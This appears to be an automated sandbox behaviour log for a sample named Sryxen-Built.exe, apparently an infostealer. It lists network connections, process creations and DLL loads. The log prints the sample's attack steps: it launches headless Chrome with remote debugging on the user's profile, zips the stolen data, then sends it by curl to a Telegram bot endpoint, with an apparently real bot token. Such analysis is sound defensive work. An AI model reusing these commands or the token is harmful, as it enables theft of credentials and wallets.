Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49835 |
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793 |
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824 |
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823 |
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786 |
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818 |
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816 |
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810 |
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770 |
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49827 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808 |
Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807 |
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769 |
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765 |
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49835 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown | Process created: C:\Users\user\Desktop\Sryxen-Built.exe "C:\Users\user\Desktop\Sryxen-Built.exe" | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu | |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2372,i,4177486499501083304,17077047075569281720,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2380 /prefetch:3 | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2132,i,1055891612558840755,6060021882091044920,262144 /prefetch:3 | |
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:3 | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip" | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Windows\System32\curl.exe curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\curl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6412 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6636 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | |
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 | |
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2040,i,17832583879177316522,5632469504734258169,262144 /prefetch:3 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6768 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip" | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Process created: C:\Windows\System32\curl.exe curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2372,i,4177486499501083304,17077047075569281720,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2380 /prefetch:3 | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2132,i,1055891612558840755,6060021882091044920,262144 /prefetch:3 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:3 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6412 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6636 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6768 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8 | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,14210214294222991142,3583806559030474698,262144 /prefetch:3 | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown | |
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2040,i,17832583879177316522,5632469504734258169,262144 /prefetch:3 | |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: webio.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Sryxen-Built.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll | |
